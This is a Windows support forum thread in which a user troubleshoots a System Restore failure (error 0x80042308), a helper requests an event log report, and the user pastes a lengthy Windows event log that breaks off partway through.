-
Still running Windows 7 or earlier? Support for Windows 7 ended on January 14th 2020. Please review the thread here for more details.
-
Microsoft Support & Malware Removal
-
Windows 7 | Windows Vista
You should upgrade or use an alternative browser.
SYSTEM RESTORE doesn’t work, error
-
Thread starter
Thread starterronxp2000
-
Start date
Start date
- Joined
- Aug 25, 2013
- Posts
- 30
-
-
#1
The error is:
The restore point could not be created for the following reason:
The specified object was not found (0x80042308)
Please try again
ALSO……….
It creates this item in the event system properties
The shadow copies of Volume C were aborted because of an IO failure on volume C
———
Ok here is what I have done:
CHKDSK /R and /F both show no errors.
SFC /SCANNOW reports nothing at all.
System protection is set so drive C (ON) and has space to create restore points, and Restore system settings and previous sessions of files is selected (but that part always changes back to TURN OFF SYSTEM PROTECTION (Why???????????????????)
Go The Power
Senior Administrator, Windows Update Expert, Contributor
-
-
#2
Please provide the following report:
Event Log Viewer
- Please download VEW.exe from Here and save it to your desktop.
- Go to your desktop and right click on VEW.exe and choose Run as Administrator
- Once open set the following settings
- ‘Select log to query’
- Tick Application
- Tick System
- ‘Select Type to list’
- Tick Critical
- Tick Error
- Tick Information
- Tick Warning
- ‘Number or date events’
- Tick Number of Events and set it to 20
- ‘Select log to query’
- Click on Run
- Once completed a notepad file will open. Please copy and paste the contents of VEW.txt back into this thread.
- Joined
- Aug 25, 2013
- Posts
- 30
-
-
#3
Report run at 08/01/2015 4:22:29 PM
Note: All dates below are in the format dd/mm/yyyy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
‘Application’ Log — Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
‘Application’ Log — Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: ‘Application’ Date/Time: 08/01/2015 6:11:01 PM
Type: Error Category: 0
Event: 8211 Source: System Restore
The scheduled restore point could not be created. Additional information: (0x80042308).
Log: ‘Application’ Date/Time: 08/01/2015 6:11:01 PM
Type: Error Category: 0
Event: 8193 Source: System Restore
Failed to create restore point (Process = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Description = Scheduled Checkpoint; Error = 0x80042308).
Log: ‘Application’ Date/Time: 08/01/2015 5:25:31 PM
Type: Error Category: 0
Event: 10007 Source: Microsoft-Windows-RestartManager
Application or service ‘SupportSoft Sprocket Service (DellSupportCenter)’ could not be restarted.
Log: ‘Application’ Date/Time: 08/01/2015 4:58:29 PM
Type: Error Category: 3
Event: 7010 Source: Microsoft-Windows-Search
The index cannot be initialized.
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Log: ‘Application’ Date/Time: 08/01/2015 4:58:29 PM
Type: Error Category: 3
Event: 3058 Source: Microsoft-Windows-Search
The application cannot be initialized.
Context: Windows Application
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Log: ‘Application’ Date/Time: 08/01/2015 4:58:29 PM
Type: Error Category: 3
Event: 3028 Source: Microsoft-Windows-Search
The gatherer object cannot be initialized.
Context: Windows Application, SystemIndex Catalog
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Log: ‘Application’ Date/Time: 08/01/2015 4:58:29 PM
Type: Error Category: 3
Event: 3029 Source: Microsoft-Windows-Search
The plug-in in <Search.TripoliIndexer> cannot be initialized.
Context: Windows Application, SystemIndex Catalog
Details:
Element not found. (HRESULT : 0x80070490) (0x80070490)
Log: ‘Application’ Date/Time: 08/01/2015 4:58:29 PM
Type: Error Category: 3
Event: 3029 Source: Microsoft-Windows-Search
The plug-in in <Search.JetPropStore> cannot be initialized.
Context: Windows Application, SystemIndex Catalog
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Log: ‘Application’ Date/Time: 08/01/2015 4:58:29 PM
Type: Error Category: 1
Event: 9002 Source: Microsoft-Windows-Search
The Windows Search Service cannot load the property store information.
Context: Windows Application, SystemIndex Catalog
Details:
The content index database is corrupt. (HRESULT : 0xc0041800) (0xc0041800)
Log: ‘Application’ Date/Time: 08/01/2015 4:58:29 PM
Type: Error Category: 3
Event: 7042 Source: Microsoft-Windows-Search
The Windows Search Service is being stopped because there is a problem with the indexer: The catalog is corrupt.
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Log: ‘Application’ Date/Time: 08/01/2015 4:58:29 PM
Type: Error Category: 3
Event: 7040 Source: Microsoft-Windows-Search
The search service has detected corrupted data files in the index {id=4700}. The service will attempt to automatically correct this problem by rebuilding the index.
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Log: ‘Application’ Date/Time: 08/01/2015 4:58:28 PM
Type: Error Category: 3
Event: 9000 Source: Microsoft-Windows-Search
The event description cannot be found.
Log: ‘Application’ Date/Time: 08/01/2015 4:58:27 PM
Type: Error Category: 3
Event: 455 Source: ESENT
Windows (3668) Windows: Error -1811 occurred while opening logfile C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS0001E.log.
Log: ‘Application’ Date/Time: 08/01/2015 3:31:59 PM
Type: Error Category: 0
Event: 8211 Source: System Restore
The scheduled restore point could not be created. Additional information: (0x80042308).
Log: ‘Application’ Date/Time: 08/01/2015 3:31:59 PM
Type: Error Category: 0
Event: 8193 Source: System Restore
Failed to create restore point (Process = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Description = Scheduled Checkpoint; Error = 0x80042308).
Log: ‘Application’ Date/Time: 08/01/2015 3:02:14 PM
Type: Error Category: 0
Event: 4 Source: Microsoft-Windows-WMI
Error 0x8004401e encountered when trying to load MOF C:\WINDOWS\SYSTEM32\WBEM\EN-US\AACLIENT.MFL while recovering .MOF file marked with autorecover.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:59 PM
Type: Error Category: 0
Event: 4 Source: Microsoft-Windows-WMI
Error 0x8004401e encountered when trying to load MOF C:\WINDOWS\SYSTEM32\WBEM\AACLIENT.MOF while recovering .MOF file marked with autorecover.
Log: ‘Application’ Date/Time: 08/01/2015 2:04:31 PM
Type: Error Category: 100
Event: 1000 Source: Application Error
Faulting application name: MotoHelperAgent.exe, version: 2.2.26.0, time stamp: 0x50004e68 Faulting module name: MotoHelperAgent.exe, version: 2.2.26.0, time stamp: 0x50004e68 Exception code: 0x40000015 Fault offset: 0x000365a0 Faulting process id: 0xa04 Faulting application start time: 0x01d02b4bd707687d Faulting application path: C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe Faulting module path: C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe Report Id: 43d5969e-973f-11e4-82f4-a4badbcdb5cc
Log: ‘Application’ Date/Time: 08/01/2015 7:13:01 AM
Type: Error Category: 0
Event: 8211 Source: System Restore
The scheduled restore point could not be created. Additional information: (0x80042308).
Log: ‘Application’ Date/Time: 08/01/2015 7:13:01 AM
Type: Error Category: 0
Event: 8193 Source: System Restore
Failed to create restore point (Process = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Description = Scheduled Checkpoint; Error = 0x80042308).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
‘Application’ Log — Information Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: ‘Application’ Date/Time: 08/01/2015 9:21:11 PM
Type: Information Category: 0
Event: 902 Source: Microsoft-Windows-Security-SPP
The Software Protection service has started. 6.1.7601.17514
Log: ‘Application’ Date/Time: 08/01/2015 9:21:11 PM
Type: Information Category: 0
Event: 1003 Source: Microsoft-Windows-Security-SPP
The Software Protection service has completed licensing status check. Application Id=55c92734-d682-4d71-983e-d6ec3f16059f Licensing Status=
1: 01f5fc37-a99e-45c5-b65e-d762f3518ead, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
2: 2e7d060d-4714-40f2-9896-1e4f15b612ad, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
3: 3b965dfc-31d9-4903-886f-873a0382776c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
4: 586bc076-c93d-429a-afe5-a69fbc644e88, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
5: 5e017a8a-f3f9-4167-b1bd-ba3e236a4d8f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
6: 5e35dc43-389b-47c5-b889-2088b06738cb, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
7: 6a7d5d8a-92af-4e6a-af4b-8fddaec800e5, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
8: 9ab82e0c-ffc9-4107-baa1-c65a8bd3ccc3, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
9: 9f83d90f-a151-4665-ae69-30b3f63ec659, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
10: a63275f4-530c-48a7-b0d3-4f00d688d151, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
11: b8a4bb91-69b1-460d-93f8-40e0670af04a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
12: d2c04e90-c3dd-4260-b0f3-f845f5d27d64, 1, 1 [(0 [0x00000000, 1, 0], [(?)(?)( 1 0x00000000 0 0 msft:rm/algorithm/bios/4.0 0x00000000 0)(?)(?)(?)])(1 )(2 )]
13: e68b141f-4dfa-4387-b3b7-e65c4889216e, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
14: ee4e1629-bcdc-4b42-a68f-b92e135f78d7, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
15: 4a8149bb-7d61-49f4-8822-82c7bf88d64b, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
16: afd5f68f-b70f-4000-a21d-28dbc8be8b07, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
Log: ‘Application’ Date/Time: 08/01/2015 9:21:11 PM
Type: Information Category: 0
Event: 1066 Source: Microsoft-Windows-Security-SPP
Initialization status for service objects. C:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/2005, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/licenserenewal/1.0, 0x00000000, 0x00000000
Log: ‘Application’ Date/Time: 08/01/2015 9:21:10 PM
Type: Information Category: 0
Event: 900 Source: Microsoft-Windows-Security-SPP
The Software Protection service is starting.
Log: ‘Application’ Date/Time: 08/01/2015 9:10:00 PM
Type: Information Category: 0
Event: 903 Source: Microsoft-Windows-Security-SPP
The Software Protection service has stopped.
Log: ‘Application’ Date/Time: 08/01/2015 9:08:08 PM
Type: Information Category: 0
Event: 8224 Source: VSS
The VSS service is shutting down due to idle timeout.
Log: ‘Application’ Date/Time: 08/01/2015 9:05:00 PM
Type: Information Category: 0
Event: 902 Source: Microsoft-Windows-Security-SPP
The Software Protection service has started. 6.1.7601.17514
Log: ‘Application’ Date/Time: 08/01/2015 9:05:00 PM
Type: Information Category: 0
Event: 1003 Source: Microsoft-Windows-Security-SPP
The Software Protection service has completed licensing status check. Application Id=55c92734-d682-4d71-983e-d6ec3f16059f Licensing Status=
1: 01f5fc37-a99e-45c5-b65e-d762f3518ead, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
2: 2e7d060d-4714-40f2-9896-1e4f15b612ad, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
3: 3b965dfc-31d9-4903-886f-873a0382776c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
4: 586bc076-c93d-429a-afe5-a69fbc644e88, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
5: 5e017a8a-f3f9-4167-b1bd-ba3e236a4d8f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
6: 5e35dc43-389b-47c5-b889-2088b06738cb, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
7: 6a7d5d8a-92af-4e6a-af4b-8fddaec800e5, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
8: 9ab82e0c-ffc9-4107-baa1-c65a8bd3ccc3, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
9: 9f83d90f-a151-4665-ae69-30b3f63ec659, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
10: a63275f4-530c-48a7-b0d3-4f00d688d151, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
11: b8a4bb91-69b1-460d-93f8-40e0670af04a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
12: d2c04e90-c3dd-4260-b0f3-f845f5d27d64, 1, 1 [(0 [0x00000000, 1, 0], [(?)(?)( 1 0x00000000 0 0 msft:rm/algorithm/bios/4.0 0x00000000 0)(?)(?)(?)])(1 )(2 )]
13: e68b141f-4dfa-4387-b3b7-e65c4889216e, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
14: ee4e1629-bcdc-4b42-a68f-b92e135f78d7, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
15: 4a8149bb-7d61-49f4-8822-82c7bf88d64b, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
16: afd5f68f-b70f-4000-a21d-28dbc8be8b07, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)])(1 )(2 )]
Log: ‘Application’ Date/Time: 08/01/2015 9:05:00 PM
Type: Information Category: 0
Event: 1066 Source: Microsoft-Windows-Security-SPP
Initialization status for service objects. C:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/2005, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000
C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/licenserenewal/1.0, 0x00000000, 0x00000000
Log: ‘Application’ Date/Time: 08/01/2015 9:04:59 PM
Type: Information Category: 0
Event: 900 Source: Microsoft-Windows-Security-SPP
The Software Protection service is starting.
Log: ‘Application’ Date/Time: 08/01/2015 9:03:48 PM
Type: Information Category: 0
Event: 8224 Source: VSS
The VSS service is shutting down due to idle timeout.
Log: ‘Application’ Date/Time: 08/01/2015 6:14:01 PM
Type: Information Category: 0
Event: 8224 Source: VSS
The VSS service is shutting down due to idle timeout.
Log: ‘Application’ Date/Time: 08/01/2015 5:30:28 PM
Type: Information Category: 0
Event: 8224 Source: VSS
The VSS service is shutting down due to idle timeout.
Log: ‘Application’ Date/Time: 08/01/2015 5:25:31 PM
Type: Information Category: 0
Event: 10001 Source: Microsoft-Windows-RestartManager
Ending session 1 started ?2015?-?01?-?08T17:24:46.536954600Z.
Log: ‘Application’ Date/Time: 08/01/2015 5:25:31 PM
Type: Information Category: 0
Event: 10001 Source: Microsoft-Windows-RestartManager
Ending session 0 started ?2015?-?01?-?08T17:24:42.246947000Z.
Log: ‘Application’ Date/Time: 08/01/2015 5:25:31 PM
Type: Information Category: 0
Event: 1042 Source: MsiInstaller
Ending a Windows Installer transaction: {E3BFEE55-39E2-4BE0-B966-89FE583822C1}. Client Process Id: 336.
Log: ‘Application’ Date/Time: 08/01/2015 5:25:31 PM
Type: Information Category: 0
Event: 1034 Source: MsiInstaller
Windows Installer removed the product. Product Name: Dell Support Center (Support Software). Product Version: 2.5.09100. Product Language: 1033. Manufacturer: Dell. Removal success or error status: 0.
Log: ‘Application’ Date/Time: 08/01/2015 5:25:31 PM
Type: Information Category: 0
Event: 11724 Source: MsiInstaller
Product: Dell Support Center (Support Software) — Removal completed successfully.
Log: ‘Application’ Date/Time: 08/01/2015 5:24:51 PM
Type: Information Category: 0
Event: 10002 Source: Microsoft-Windows-RestartManager
Shutting down application or service ‘SupportSoft Sprocket Service (DellSupportCenter)’.
Log: ‘Application’ Date/Time: 08/01/2015 5:24:46 PM
Type: Information Category: 0
Event: 10000 Source: Microsoft-Windows-RestartManager
Starting session 1 — ?2015?-?01?-?08T17:24:46.536954600Z.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
‘Application’ Log — Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: ‘Application’ Date/Time: 08/01/2015 4:58:31 PM
Type: Warning Category: 1
Event: 1008 Source: Microsoft-Windows-Search
The Windows Search Service is starting up and attempting to remove the old search index {Reason: Index Corruption}.
Log: ‘Application’ Date/Time: 08/01/2015 4:56:26 PM
Type: Warning Category: 0
Event: 1530 Source: Microsoft-Windows-User Profiles Service
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards. DETAIL — 9 user registry handles leaked from \Registry\User\S-1-5-21-3458110519-2197518297-3206158447-1001:
Process 3080 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 3080 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 3080 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\SmartCardRoot
Process 3080 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\trust
Process 3080 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 3080 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 4068 (\Device\HarddiskVolume3\WINDOWS\System32\msiexec.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\Windows\CurrentVersion\Explorer
Process 3080 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\CA
Process 3080 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\Root
Log: ‘Application’ Date/Time: 08/01/2015 4:13:36 PM
Type: Warning Category: 0
Event: 1530 Source: Microsoft-Windows-User Profiles Service
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards. DETAIL — 30 user registry handles leaked from \Registry\User\S-1-5-21-3458110519-2197518297-3206158447-1001:
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\SmartCardRoot
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\SmartCardRoot
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\trust
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\trust
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Policies\Microsoft\SystemCertificates
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\TrustedPeople
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\TrustedPeople
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\My
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\My
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\CA
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\CA
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\Root
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\Root
Process 3312 (\Device\HarddiskVolume3\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\Disallowed
Process 536 (\Device\HarddiskVolume3\WINDOWS\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-3458110519-2197518297-3206158447-1001\Software\Microsoft\SystemCertificates\Disallowed
Log: ‘Application’ Date/Time: 08/01/2015 3:02:25 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, WpcClamperProv, has been registered in the Windows Management Instrumentation namespace ROOT\CIMV2\Applications\WindowsParentalControls to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:02:25 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, WpcClamperProv, has been registered in the Windows Management Instrumentation namespace ROOT\CIMV2\Applications\WindowsParentalControls to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:02:18 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, OffProv12, has been registered in the Windows Management Instrumentation namespace Root\MSAPPS12 to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:02:18 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, OffProv12, has been registered in the Windows Management Instrumentation namespace Root\MSAPPS12 to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:02:04 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, WpcClamperProv, has been registered in the Windows Management Instrumentation namespace ROOT\CIMV2\Applications\WindowsParentalControls to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:02:04 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, WpcClamperProv, has been registered in the Windows Management Instrumentation namespace ROOT\CIMV2\Applications\WindowsParentalControls to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:58 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
A provider, MS_NT_EVENTLOG_EVENT_PROVIDER, has been registered in the Windows Management Instrumentation namespace Root\CIMV2 to use the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests.
Log: ‘Application’ Date/Time: 08/01/2015 3:01:58 PM
Type: Warning Category: 0
Event: 63 Source: Microsoft-Windows-WMI
